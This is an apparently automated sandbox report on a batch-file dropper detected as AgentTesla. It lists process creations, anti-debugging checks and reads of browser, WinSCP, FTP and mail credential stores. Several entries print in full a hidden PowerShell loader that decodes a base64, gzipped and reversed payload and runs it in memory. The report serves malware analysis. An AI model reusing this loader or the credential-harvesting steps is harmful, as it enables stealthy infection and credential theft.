                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 20_2_00AE70B0 CheckRemoteDebuggerPresent,20_2_00AE70B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe c:\users\user\desktop\87m9y3p4z7.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\desktop\87m9y3p4z7.bat' | select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
                    Source: C:\Windows\System32\xcopy.exeProcess created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe c:\users\user\appdata\roaming\channeluris.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\appdata\roaming\channeluris.bat' | select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe c:\users\user\desktop\87m9y3p4z7.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\desktop\87m9y3p4z7.bat' | select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe c:\users\user\appdata\roaming\channeluris.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\appdata\roaming\channeluris.bat' | select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2417476771.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.4700981421.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2417476771.000000000284F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6196, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5092, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6196, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5092, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2417476771.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.4700981421.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2417476771.000000000284F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6196, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5092, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information112
                    Scripting                    		Valid Accounts121
                    Windows Management Instrumentation                    		112
                    Scripting                    		1
